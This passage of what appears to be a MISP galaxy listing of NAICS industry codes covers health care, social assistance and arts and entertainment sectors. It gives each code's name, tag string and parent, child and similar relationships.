  • parent-of: misp-galaxy:naics="621340" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62139" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621391" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621399" with estimative-language:likelihood-probability="likely"

62131

Offices of Chiropractors

The tag is: misp-galaxy:naics="62131"

62131 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="621310" with estimative-language:likelihood-probability="likely"

621310

Offices of Chiropractors

The tag is: misp-galaxy:naics="621310"

621310 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62131" with estimative-language:likelihood-probability="likely"

62132

Offices of Optometrists

The tag is: misp-galaxy:naics="62132"

62132 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="621320" with estimative-language:likelihood-probability="likely"

621320

Offices of Optometrists

The tag is: misp-galaxy:naics="621320"

621320 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62132" with estimative-language:likelihood-probability="likely"

62133

Offices of Mental Health Practitioners (except Physicians)

The tag is: misp-galaxy:naics="62133"

62133 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="621330" with estimative-language:likelihood-probability="likely"

621330

Offices of Mental Health Practitioners (except Physicians)

The tag is: misp-galaxy:naics="621330"

621330 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62133" with estimative-language:likelihood-probability="likely"

62134

Offices of Physical, Occupational and Speech Therapists, and Audiologists

The tag is: misp-galaxy:naics="62134"

62134 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="621340" with estimative-language:likelihood-probability="likely"

621340

Offices of Physical, Occupational and Speech Therapists, and Audiologists

The tag is: misp-galaxy:naics="621340"

621340 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62134" with estimative-language:likelihood-probability="likely"

62139

Offices of All Other Health Practitioners

The tag is: misp-galaxy:naics="62139"

62139 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

621391

Offices of Podiatrists

The tag is: misp-galaxy:naics="621391"

621391 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

621399

Offices of All Other Miscellaneous Health Practitioners

The tag is: misp-galaxy:naics="621399"

621399 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

6214

Outpatient Care Centers

The tag is: misp-galaxy:naics="6214"

6214 has relationships with:

  • child-of: misp-galaxy:naics="621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62142" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621420" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62149" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621491" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621492" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621493" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621498" with estimative-language:likelihood-probability="likely"

62141

Family Planning Centers

The tag is: misp-galaxy:naics="62141"

62141 has relationships with:

  • child-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="621410" with estimative-language:likelihood-probability="likely"

621410

Family Planning Centers

The tag is: misp-galaxy:naics="621410"

621410 has relationships with:

  • child-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62141" with estimative-language:likelihood-probability="likely"

62142

Outpatient Mental Health and Substance Abuse Centers

The tag is: misp-galaxy:naics="62142"

62142 has relationships with:

  • child-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="621420" with estimative-language:likelihood-probability="likely"

621420

Outpatient Mental Health and Substance Abuse Centers

The tag is: misp-galaxy:naics="621420"

621420 has relationships with:

  • child-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62142" with estimative-language:likelihood-probability="likely"

62149

Other Outpatient Care Centers

The tag is: misp-galaxy:naics="62149"

62149 has relationships with:

  • child-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

621491

HMO Medical Centers

The tag is: misp-galaxy:naics="621491"

621491 has relationships with:

  • child-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

621492

Kidney Dialysis Centers

The tag is: misp-galaxy:naics="621492"

621492 has relationships with:

  • child-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

621493

Freestanding Ambulatory Surgical and Emergency Centers

The tag is: misp-galaxy:naics="621493"

621493 has relationships with:

  • child-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

621498

All Other Outpatient Care Centers

The tag is: misp-galaxy:naics="621498"

621498 has relationships with:

  • child-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

6215

Medical and Diagnostic Laboratories

The tag is: misp-galaxy:naics="6215"

6215 has relationships with:

  • child-of: misp-galaxy:naics="621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62151" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621512" with estimative-language:likelihood-probability="likely"

62151

Medical and Diagnostic Laboratories

The tag is: misp-galaxy:naics="62151"

62151 has relationships with:

  • child-of: misp-galaxy:naics="6215" with estimative-language:likelihood-probability="likely"

621511

Medical Laboratories

The tag is: misp-galaxy:naics="621511"

621511 has relationships with:

  • child-of: misp-galaxy:naics="6215" with estimative-language:likelihood-probability="likely"

621512

Diagnostic Imaging Centers

The tag is: misp-galaxy:naics="621512"

621512 has relationships with:

  • child-of: misp-galaxy:naics="6215" with estimative-language:likelihood-probability="likely"

6216

Home Health Care Services

The tag is: misp-galaxy:naics="6216"

6216 has relationships with:

  • child-of: misp-galaxy:naics="621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62161" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621610" with estimative-language:likelihood-probability="likely"

62161

Home Health Care Services

The tag is: misp-galaxy:naics="62161"

62161 has relationships with:

  • child-of: misp-galaxy:naics="6216" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="621610" with estimative-language:likelihood-probability="likely"

621610

Home Health Care Services

The tag is: misp-galaxy:naics="621610"

621610 has relationships with:

  • child-of: misp-galaxy:naics="6216" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62161" with estimative-language:likelihood-probability="likely"

6219

Other Ambulatory Health Care Services

The tag is: misp-galaxy:naics="6219"

6219 has relationships with:

  • child-of: misp-galaxy:naics="621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62199" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621999" with estimative-language:likelihood-probability="likely"

62191

Ambulance Services

The tag is: misp-galaxy:naics="62191"

62191 has relationships with:

  • child-of: misp-galaxy:naics="6219" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="621910" with estimative-language:likelihood-probability="likely"

621910

Ambulance Services

The tag is: misp-galaxy:naics="621910"

621910 has relationships with:

  • child-of: misp-galaxy:naics="6219" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62191" with estimative-language:likelihood-probability="likely"

62199

All Other Ambulatory Health Care Services

The tag is: misp-galaxy:naics="62199"

62199 has relationships with:

  • child-of: misp-galaxy:naics="6219" with estimative-language:likelihood-probability="likely"

621991

Blood and Organ Banks

The tag is: misp-galaxy:naics="621991"

621991 has relationships with:

  • child-of: misp-galaxy:naics="6219" with estimative-language:likelihood-probability="likely"

621999

All Other Miscellaneous Ambulatory Health Care Services

The tag is: misp-galaxy:naics="621999"

621999 has relationships with:

  • child-of: misp-galaxy:naics="6219" with estimative-language:likelihood-probability="likely"

622

Hospitals

The tag is: misp-galaxy:naics="622"

622 has relationships with:

  • child-of: misp-galaxy:naics="62" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6222" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6223" with estimative-language:likelihood-probability="likely"

6221

General Medical and Surgical Hospitals

The tag is: misp-galaxy:naics="6221"

6221 has relationships with:

  • child-of: misp-galaxy:naics="622" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="622110" with estimative-language:likelihood-probability="likely"

62211

General Medical and Surgical Hospitals

The tag is: misp-galaxy:naics="62211"

62211 has relationships with:

  • child-of: misp-galaxy:naics="6221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="622110" with estimative-language:likelihood-probability="likely"

622110

General Medical and Surgical Hospitals

The tag is: misp-galaxy:naics="622110"

622110 has relationships with:

  • child-of: misp-galaxy:naics="6221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62211" with estimative-language:likelihood-probability="likely"

6222

Psychiatric and Substance Abuse Hospitals

The tag is: misp-galaxy:naics="6222"

6222 has relationships with:

  • child-of: misp-galaxy:naics="622" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="622210" with estimative-language:likelihood-probability="likely"

62221

Psychiatric and Substance Abuse Hospitals

The tag is: misp-galaxy:naics="62221"

62221 has relationships with:

  • child-of: misp-galaxy:naics="6222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="622210" with estimative-language:likelihood-probability="likely"

622210

Psychiatric and Substance Abuse Hospitals

The tag is: misp-galaxy:naics="622210"

622210 has relationships with:

  • child-of: misp-galaxy:naics="6222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62221" with estimative-language:likelihood-probability="likely"

6223

Specialty (except Psychiatric and Substance Abuse) Hospitals

The tag is: misp-galaxy:naics="6223"

6223 has relationships with:

  • child-of: misp-galaxy:naics="622" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="622310" with estimative-language:likelihood-probability="likely"

62231

Specialty (except Psychiatric and Substance Abuse) Hospitals

The tag is: misp-galaxy:naics="62231"

62231 has relationships with:

  • child-of: misp-galaxy:naics="6223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="622310" with estimative-language:likelihood-probability="likely"

622310

Specialty (except Psychiatric and Substance Abuse) Hospitals

The tag is: misp-galaxy:naics="622310"

622310 has relationships with:

  • child-of: misp-galaxy:naics="6223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62231" with estimative-language:likelihood-probability="likely"

623

Nursing and Residential Care Facilities

The tag is: misp-galaxy:naics="623"

623 has relationships with:

  • child-of: misp-galaxy:naics="62" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6232" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6233" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6239" with estimative-language:likelihood-probability="likely"

6231

Nursing Care Facilities (Skilled Nursing Facilities)

The tag is: misp-galaxy:naics="6231"

6231 has relationships with:

  • child-of: misp-galaxy:naics="623" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="623110" with estimative-language:likelihood-probability="likely"

62311

Nursing Care Facilities (Skilled Nursing Facilities)

The tag is: misp-galaxy:naics="62311"

62311 has relationships with:

  • child-of: misp-galaxy:naics="6231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="623110" with estimative-language:likelihood-probability="likely"

623110

Nursing Care Facilities (Skilled Nursing Facilities)

The tag is: misp-galaxy:naics="623110"

623110 has relationships with:

  • child-of: misp-galaxy:naics="6231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62311" with estimative-language:likelihood-probability="likely"

6232

Residential Intellectual and Developmental Disability, Mental Health, and Substance Abuse Facilities

The tag is: misp-galaxy:naics="6232"

6232 has relationships with:

  • child-of: misp-galaxy:naics="623" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="623210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62322" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="623220" with estimative-language:likelihood-probability="likely"

62321

Residential Intellectual and Developmental Disability Facilities

The tag is: misp-galaxy:naics="62321"

62321 has relationships with:

  • child-of: misp-galaxy:naics="6232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="623210" with estimative-language:likelihood-probability="likely"

623210

Residential Intellectual and Developmental Disability Facilities

The tag is: misp-galaxy:naics="623210"

623210 has relationships with:

  • child-of: misp-galaxy:naics="6232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62321" with estimative-language:likelihood-probability="likely"

62322

Residential Mental Health and Substance Abuse Facilities

The tag is: misp-galaxy:naics="62322"

62322 has relationships with:

  • child-of: misp-galaxy:naics="6232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="623220" with estimative-language:likelihood-probability="likely"

623220

Residential Mental Health and Substance Abuse Facilities

The tag is: misp-galaxy:naics="623220"

623220 has relationships with:

  • child-of: misp-galaxy:naics="6232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62322" with estimative-language:likelihood-probability="likely"

6233

Continuing Care Retirement Communities and Assisted Living Facilities for the Elderly

The tag is: misp-galaxy:naics="6233"

6233 has relationships with:

  • child-of: misp-galaxy:naics="623" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="623311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="623312" with estimative-language:likelihood-probability="likely"

62331

Continuing Care Retirement Communities and Assisted Living Facilities for the Elderly

The tag is: misp-galaxy:naics="62331"

62331 has relationships with:

  • child-of: misp-galaxy:naics="6233" with estimative-language:likelihood-probability="likely"

623311

Continuing Care Retirement Communities

The tag is: misp-galaxy:naics="623311"

623311 has relationships with:

  • child-of: misp-galaxy:naics="6233" with estimative-language:likelihood-probability="likely"

623312

Assisted Living Facilities for the Elderly

The tag is: misp-galaxy:naics="623312"

623312 has relationships with:

  • child-of: misp-galaxy:naics="6233" with estimative-language:likelihood-probability="likely"

6239

Other Residential Care Facilities

The tag is: misp-galaxy:naics="6239"

6239 has relationships with:

  • child-of: misp-galaxy:naics="623" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62399" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="623990" with estimative-language:likelihood-probability="likely"

62399

Other Residential Care Facilities

The tag is: misp-galaxy:naics="62399"

62399 has relationships with:

  • child-of: misp-galaxy:naics="6239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="623990" with estimative-language:likelihood-probability="likely"

623990

Other Residential Care Facilities

The tag is: misp-galaxy:naics="623990"

623990 has relationships with:

  • child-of: misp-galaxy:naics="6239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62399" with estimative-language:likelihood-probability="likely"

624

Social Assistance

The tag is: misp-galaxy:naics="624"

624 has relationships with:

  • child-of: misp-galaxy:naics="62" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6241" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6242" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6243" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6244" with estimative-language:likelihood-probability="likely"

6241

Individual and Family Services

The tag is: misp-galaxy:naics="6241"

6241 has relationships with:

  • child-of: misp-galaxy:naics="624" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62419" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624190" with estimative-language:likelihood-probability="likely"

62411

Child and Youth Services

The tag is: misp-galaxy:naics="62411"

62411 has relationships with:

  • child-of: misp-galaxy:naics="6241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="624110" with estimative-language:likelihood-probability="likely"

624110

Child and Youth Services

The tag is: misp-galaxy:naics="624110"

624110 has relationships with:

  • child-of: misp-galaxy:naics="6241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62411" with estimative-language:likelihood-probability="likely"

62412

Services for the Elderly and Persons with Disabilities

The tag is: misp-galaxy:naics="62412"

62412 has relationships with:

  • child-of: misp-galaxy:naics="6241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="624120" with estimative-language:likelihood-probability="likely"

624120

Services for the Elderly and Persons with Disabilities

The tag is: misp-galaxy:naics="624120"

624120 has relationships with:

  • child-of: misp-galaxy:naics="6241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62412" with estimative-language:likelihood-probability="likely"

62419

Other Individual and Family Services

The tag is: misp-galaxy:naics="62419"

62419 has relationships with:

  • child-of: misp-galaxy:naics="6241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="624190" with estimative-language:likelihood-probability="likely"

624190

Other Individual and Family Services

The tag is: misp-galaxy:naics="624190"

624190 has relationships with:

  • child-of: misp-galaxy:naics="6241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62419" with estimative-language:likelihood-probability="likely"

6242

Community Food and Housing, and Emergency and Other Relief Services

The tag is: misp-galaxy:naics="6242"

6242 has relationships with:

  • child-of: misp-galaxy:naics="624" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62421" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62422" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624229" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624230" with estimative-language:likelihood-probability="likely"

62421

Community Food Services

The tag is: misp-galaxy:naics="62421"

62421 has relationships with:

  • child-of: misp-galaxy:naics="6242" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="624210" with estimative-language:likelihood-probability="likely"

624210

Community Food Services

The tag is: misp-galaxy:naics="624210"

624210 has relationships with:

  • child-of: misp-galaxy:naics="6242" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62421" with estimative-language:likelihood-probability="likely"

62422

Community Housing Services

The tag is: misp-galaxy:naics="62422"

62422 has relationships with:

  • child-of: misp-galaxy:naics="6242" with estimative-language:likelihood-probability="likely"

624221

Temporary Shelters

The tag is: misp-galaxy:naics="624221"

624221 has relationships with:

  • child-of: misp-galaxy:naics="6242" with estimative-language:likelihood-probability="likely"

624229

Other Community Housing Services

The tag is: misp-galaxy:naics="624229"

624229 has relationships with:

  • child-of: misp-galaxy:naics="6242" with estimative-language:likelihood-probability="likely"

62423

Emergency and Other Relief Services

The tag is: misp-galaxy:naics="62423"

62423 has relationships with:

  • child-of: misp-galaxy:naics="6242" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="624230" with estimative-language:likelihood-probability="likely"

624230

Emergency and Other Relief Services

The tag is: misp-galaxy:naics="624230"

624230 has relationships with:

  • child-of: misp-galaxy:naics="6242" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62423" with estimative-language:likelihood-probability="likely"

6243

Vocational Rehabilitation Services

The tag is: misp-galaxy:naics="6243"

6243 has relationships with:

  • child-of: misp-galaxy:naics="624" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62431" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624310" with estimative-language:likelihood-probability="likely"

62431

Vocational Rehabilitation Services

The tag is: misp-galaxy:naics="62431"

62431 has relationships with:

  • child-of: misp-galaxy:naics="6243" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="624310" with estimative-language:likelihood-probability="likely"

624310

Vocational Rehabilitation Services

The tag is: misp-galaxy:naics="624310"

624310 has relationships with:

  • child-of: misp-galaxy:naics="6243" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62431" with estimative-language:likelihood-probability="likely"

6244

Child Care Services

The tag is: misp-galaxy:naics="6244"

6244 has relationships with:

  • child-of: misp-galaxy:naics="624" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62441" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624410" with estimative-language:likelihood-probability="likely"

62441

Child Care Services

The tag is: misp-galaxy:naics="62441"

62441 has relationships with:

  • child-of: misp-galaxy:naics="6244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="624410" with estimative-language:likelihood-probability="likely"

624410

Child Care Services

The tag is: misp-galaxy:naics="624410"

624410 has relationships with:

  • child-of: misp-galaxy:naics="6244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62441" with estimative-language:likelihood-probability="likely"

71

Arts, Entertainment, and Recreation

The tag is: misp-galaxy:naics="71"

71 has relationships with:

  • parent-of: misp-galaxy:naics="711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="712" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713" with estimative-language:likelihood-probability="likely"

711

Performing Arts, Spectator Sports, and Related Industries

The tag is: misp-galaxy:naics="711"

711 has relationships with:

  • child-of: misp-galaxy:naics="71" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7115" with estimative-language:likelihood-probability="likely"

7111

Performing Arts Companies

The tag is: misp-galaxy:naics="7111"

7111 has relationships with:

  • child-of: misp-galaxy:naics="711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71119" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711190" with estimative-language:likelihood-probability="likely"

71111

Theater Companies and Dinner Theaters

The tag is: misp-galaxy:naics="71111"

71111 has relationships with:

  • child-of: misp-galaxy:naics="7111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="711110" with estimative-language:likelihood-probability="likely"

711110

Theater Companies and Dinner Theaters

The tag is: misp-galaxy:naics="711110"

711110 has relationships with:

  • child-of: misp-galaxy:naics="7111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71111" with estimative-language:likelihood-probability="likely"

71112

Dance Companies

The tag is: misp-galaxy:naics="71112"

71112 has relationships with:

  • child-of: misp-galaxy:naics="7111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="711120" with estimative-language:likelihood-probability="likely"

711120

Dance Companies

The tag is: misp-galaxy:naics="711120"

711120 has relationships with:

  • child-of: misp-galaxy:naics="7111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71112" with estimative-language:likelihood-probability="likely"

71113

Musical Groups and Artists

The tag is: misp-galaxy:naics="71113"

71113 has relationships with:

  • child-of: misp-galaxy:naics="7111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="711130" with estimative-language:likelihood-probability="likely"

711130

Musical Groups and Artists

The tag is: misp-galaxy:naics="711130"

711130 has relationships with:

  • child-of: misp-galaxy:naics="7111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71113" with estimative-language:likelihood-probability="likely"

71119

Other Performing Arts Companies

The tag is: misp-galaxy:naics="71119"

71119 has relationships with:

  • child-of: misp-galaxy:naics="7111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="711190" with estimative-language:likelihood-probability="likely"

711190

Other Performing Arts Companies

The tag is: misp-galaxy:naics="711190"

711190 has relationships with:

  • child-of: misp-galaxy:naics="7111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71119" with estimative-language:likelihood-probability="likely"

7112

Spectator Sports

The tag is: misp-galaxy:naics="7112"

7112 has relationships with:

  • child-of: misp-galaxy:naics="711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711219" with estimative-language:likelihood-probability="likely"

71121

Spectator Sports

The tag is: misp-galaxy:naics="71121"

71121 has relationships with:

  • child-of: misp-galaxy:naics="7112" with estimative-language:likelihood-probability="likely"

711211

Sports Teams and Clubs

The tag is: misp-galaxy:naics="711211"

711211 has relationships with:

  • child-of: misp-galaxy:naics="7112" with estimative-language:likelihood-probability="likely"

711212

Racetracks

The tag is: misp-galaxy:naics="711212"

711212 has relationships with:

  • child-of: misp-galaxy:naics="7112" with estimative-language:likelihood-probability="likely"

711219

Other Spectator Sports

The tag is: misp-galaxy:naics="711219"

711219 has relationships with:

  • child-of: misp-galaxy:naics="7112" with estimative-language:likelihood-probability="likely"

7113

Promoters of Performing Arts, Sports, and Similar Events

The tag is: misp-galaxy:naics="7113"

7113 has relationships with:

  • child-of: misp-galaxy:naics="711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711320" with estimative-language:likelihood-probability="likely"

71131

Promoters of Performing Arts, Sports, and Similar Events with Facilities

The tag is: misp-galaxy:naics="71131"

71131 has relationships with:

  • child-of: misp-galaxy:naics="7113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="711310" with estimative-language:likelihood-probability="likely"

711310

Promoters of Performing Arts, Sports, and Similar Events with Facilities

The tag is: misp-galaxy:naics="711310"

711310 has relationships with:

  • child-of: misp-galaxy:naics="7113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71131" with estimative-language:likelihood-probability="likely"

71132

Promoters of Performing Arts, Sports, and Similar Events without Facilities

The tag is: misp-galaxy:naics="71132"

71132 has relationships with:

  • child-of: misp-galaxy:naics="7113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="711320" with estimative-language:likelihood-probability="likely"

711320

Promoters of Performing Arts, Sports, and Similar Events without Facilities

The tag is: misp-galaxy:naics="711320"

711320 has relationships with:

  • child-of: misp-galaxy:naics="7113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71132" with estimative-language:likelihood-probability="likely"

7114

Agents and Managers for Artists, Athletes, Entertainers, and Other Public Figures

The tag is: misp-galaxy:naics="7114"

7114 has relationships with:

  • child-of: misp-galaxy:naics="711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711410" with estimative-language:likelihood-probability="likely"

71141

Agents and Managers for Artists, Athletes, Entertainers, and Other Public Figures

The tag is: misp-galaxy:naics="71141"

71141 has relationships with:

